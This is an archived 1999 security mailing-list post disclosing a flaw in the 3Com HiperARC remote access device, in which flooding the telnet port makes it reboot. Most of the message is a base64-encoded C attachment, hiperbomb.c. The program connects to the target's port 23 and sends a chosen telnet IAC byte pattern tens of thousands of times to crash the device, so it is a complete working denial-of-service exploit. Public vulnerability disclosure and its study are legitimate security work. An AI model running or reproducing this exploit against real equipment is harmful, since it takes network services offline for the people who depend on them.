3com hiperarch flaw [hiperbomb.c]

From: Jonathan Chapman (jchapmanat_private)
Date: Thu Aug 12 1999 - 15:10:44 PDT

Next message: Shok: "w00w00's efnet ircd advisory (exploit included)"

Previous message: Martin Schulze: "Re: Severe bug in cfingerd before 1.4.0"
Next in thread: synFlood: "Re: 3com hiperarch flaw [hiperbomb.c]"
Reply: synFlood: "Re: 3com hiperarch flaw [hiperbomb.c]"
Reply: Charles Sprickman: "Re: 3com hiperarch flaw [hiperbomb.c]"
Reply: Mike Wronski: "Re: 3com hiperarch flaw [hiperbomb.c]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mimeat_private for more info.

---254732288-1621199452-934495844=:27775
Content-Type: TEXT/PLAIN; charset=US-ASCII

Hello,

The attached program will reboot a 3com HiperARC.  I made an attempt to
contact 3com before posting this report, however, I received no response.
By flooding the telnet port of a 3com HiperARC using the provided program,
the HiperARC unconditionally reboots.  This program is effective over all
interfaces, including a dialup.

Regards,

Jonathan Chapman
Director of Network Security
FIRST Incorporated
jchapmanat_private  www.1st.net


---254732288-1621199452-934495844=:27775
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="hiperbomb.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.9908121810440.27775at_private>
Content-Description: Reboots HiperARC [kaboom]
Content-Disposition: attachment; filename="hiperbomb.c"

LyogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQogKiBoaXBlcmJvbWIyLmMg
LSBSZWJvb3RzIEhpcGVyQVJDIGZhc3Rlci4NCiAqIC0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KICogKGMpIDE5OTkgLSBKb25hdGhhbiBDaGFwbWFuIDxq
Y2hhcG1hbkAxc3QubmV0Pg0KICogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
DQogKiBTZW5kcyBhIGhpZ2ggdm9sdW1lIG9mIElBQ3Mgd2hpY2ggZXZlbnR1
YWxseSBsZWFkcyB0byBhIHJlYm9vdCBvZiB0aGUNCiAqIEhpcGVyQVJDLiAg
QnJpZWYgdGVzdGluZyBpbmRpY2F0ZWQgdGhhdCB0aGlzIHByb2JsZW0gaXMg
bW9zdCBsaWtlbHkgDQogKiBzcGVjaWZpYyB0byBzZW5kaW5nIElBQ3MgcmF0
aGVyIHRoYW4gYW55IG90aGVyIHR5cGUgb2YgZGF0YS4gIEZ1cnRoZXINCiAq
IHJlc2VhcmNoIGhhcyBzaG93biB0aGF0IHNwZWNpZmljIElBQyBwYXR0ZXJu
cyBhcmUgbW9yZSBsaWtlbHkgdG8gY2F1c2UNCiAqIGEgcmVib290LiAgSW4g
dGhpcyBleGFtcGxlIEkgdXNlIG9uZSBvZiB0aGUgbW9zdCBlZmZpY2llbnQg
Y29tYmluYXRpb25zDQogKiBJIGhhdmUgZGlzY292ZXJlZC4gIFRocm91Z2gg
bXkgdGVzdGluZyBpdCB1c3VhbGx5IHJlcXVpcmVkIGF0IGxlYXN0DQogKiA2
MCwwMDAgcGFja2V0cyB0byBjYXVzZSB0aGUgSGlwZXJBUkMgdG8gcmVib290
Lg0KICogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQogKi8NCg0KDQojaW5j
bHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDxzdGRhcmcuaD4NCiNpbmNsdWRl
IDxmY250bC5oPg0KI2luY2x1ZGUgPG5ldGRiLmg+DQojaW5jbHVkZSA8bmV0
aW5ldC9pbi5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCg0KY2hhciAq
Y2hhc3NpczsNCmludCBzb2NrZmQsIG51bV9vZl90cmllczsNCg0Kdm9pZCBj
b25uZWN0X3RvX2NoYXNzaXMoY2hhciAqbmFtZSkNCnsNCiAgICAgICAgc3Ry
dWN0IGhvc3RlbnQgKmhvc3Q7DQogICAgICAgIHN0cnVjdCBzb2NrYWRkcl9p
biByZW1vdGU7DQoNCiAgICAgICAgaG9zdCA9IGdldGhvc3RieW5hbWUobmFt
ZSk7DQoNCiAgICAgICAgaWYoIWhvc3QpIHsNCglmcHJpbnRmKHN0ZGVyciwg
IkNhbm5vdCByZXNvbHZlIGhvc3QgJXMuXG4iLCBuYW1lKTsNCiAgICAgICAg
ZXhpdCgzKTsNCiAgICAgICAgfQ0KDQogICAgICAgIHNvY2tmZCA9IHNvY2tl
dChBRl9JTkVULCBTT0NLX1NUUkVBTSwgMCk7DQoNCiAgICAgICAgaWYoc29j
a2ZkIDwgMCkgew0KICAgICAgICBmcHJpbnRmKHN0ZGVyciwgIkNhbm5vdCBv
YnRhaW4gZGVzY3JpcHRvci5cbiIpOw0KCWV4aXQoNCk7DQogICAgICAgIH0N
Cg0KICAgICAgICByZW1vdGUuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAg
ICAgIHJlbW90ZS5zaW5fYWRkciA9ICooc3RydWN0IGluX2FkZHIgKikqaG9z
dC0+aF9hZGRyX2xpc3Q7DQogICAgICAgIHJlbW90ZS5zaW5fcG9ydCA9IGh0
b25zKDIzKTsNCg0KICAgICAgICBjb25uZWN0KHNvY2tmZCwgKHN0cnVjdCBz
b2NrYWRkciAqKSZyZW1vdGUsIHNpemVvZihyZW1vdGUpKTsNCg0KCXJldHVy
bjsNCn0NCg0Kdm9pZCBzZW5kX2lhY3MoKQ0Kew0KICAgICAgICB1bnNpZ25l
ZCBjaGFyIHJlcGx5WzNdID0gezI1NCwgMzYsIDE4NX07DQoJdW5zaWduZWQg
aW50IGs7DQoNCiAgICAgICAgZm9yKGsgPSAwOyBrIDwgbnVtX29mX3RyaWVz
OyBrKyspIHsNCiAgICAgICAgd3JpdGUoc29ja2ZkLCByZXBseSwgMyk7DQoJ
fQ0KfQ0KDQppbnQgbWFpbihpbnQgYWMsIGNoYXIgKiphdikNCnsNCg0KICAg
ICAgICBpZihhYyA8IDMpIHsNCiAgICAgICAgZnByaW50ZihzdGRlcnIsICJT
eW50YXg6ICVzIDxjaGFzc2lzIG5hbWU+IDxudW0gb2YgcGFja2V0cz5cbiIs
IGF2WzBdKTsNCglmcHJpbnRmKHN0ZGVyciwgIkFwcHJveGltYXRlbHkgNjAs
MDAwIHBhY2tldHMgdXN1YWxseSB0YWtlcyBjYXJlIG9mIHRoZSBqb2IuXG4i
KTsNCiAgICAgICAgZXhpdCgyKTsNCiAgICAgICAgfQ0KDQogICAgICAgIGNo
YXNzaXMgPSBhdlsxXTsNCgludW1fb2ZfdHJpZXMgPSBhdG9pKGF2WzJdKTsN
Cg0KICAgICAgICBmcHJpbnRmKHN0ZGVyciwgIkJlZ2lubmluZyBhdHRhY2sg
b24gY2hhc3NpcyAlcyBbJWQgcGFja2V0c11cbiIsIA0KCQljaGFzc2lzLCBu
dW1fb2ZfdHJpZXMpOw0KICAgICAgICBjb25uZWN0X3RvX2NoYXNzaXMoY2hh
c3Npcyk7DQogICAgICAgIHNlbmRfaWFjcygpOw0KICAgICAgICBmcHJpbnRm
KHN0ZGVyciwgIkF0dGFjayBjb21wbGV0ZS5cbiIpOw0KDQogICAgICAgIGV4
aXQoMCk7DQp9DQoNCg==
---254732288-1621199452-934495844=:27775--

Next message: Shok: "w00w00's efnet ircd advisory (exploit included)"
Previous message: Martin Schulze: "Re: Severe bug in cfingerd before 1.4.0"
Next in thread: synFlood: "Re: 3com hiperarch flaw [hiperbomb.c]"
Reply: synFlood: "Re: 3com hiperarch flaw [hiperbomb.c]"
Reply: Charles Sprickman: "Re: 3com hiperarch flaw [hiperbomb.c]"
Reply: Mike Wronski: "Re: 3com hiperarch flaw [hiperbomb.c]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:56:10 PDT